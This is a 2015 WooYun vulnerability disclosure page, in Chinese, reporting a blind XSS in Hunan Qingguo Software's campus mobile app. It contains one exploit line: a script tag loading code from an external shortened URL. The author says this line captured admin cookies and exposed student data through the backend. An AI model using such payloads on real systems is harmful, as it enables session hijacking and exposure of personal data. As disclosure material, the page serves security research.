当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153291

漏洞标题:青果软件手机APP掌上校园某处XSS盲打以打到后台和cookies

相关厂商:湖南青果软件有限公司

漏洞作者: js2012

提交时间:2015-11-10 14:01

修复时间:2015-11-23 10:54

公开时间:2015-11-23 10:54

漏洞类型:XSS 跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

提交的没通过,说是要完整的问题复现也是醉了。。。。。在提交一次

详细说明:

漏洞利用代码:

<script src=http://t.cn/RUUNjzh></script>


IC_E5%SEZU3{PLSB@ET39RO.png


这是同IP的网站的确隶属于湖南青果软件有限公司:

3Q)YC4SLH43EZYSC@E)7X$P.png

XKO@WZG_4RPOYC`JHLFDYV9.png


漏洞证明:

漏洞证明


3NTQQ[0B71B1%Y)O6L1R%3V.png


}Y@V`EB$}PP@[U]728`5F%X.png


以使用cookies登录后台界面看到学生数据:

})ME3D~A~}NA(U9ZK%T%NGU.png


这个是我昨天提交的漏洞代码源代码可以清楚的看见成功插入的XSS code:

1GSY}}XJ73WK]XRLGQTTKM4.png


修复方案:

这次在不给过,可就伤心了。。。。。。都描述那么详细了。。。。。。

版权声明:转载请注明来源 js2012@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-23 10:54

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无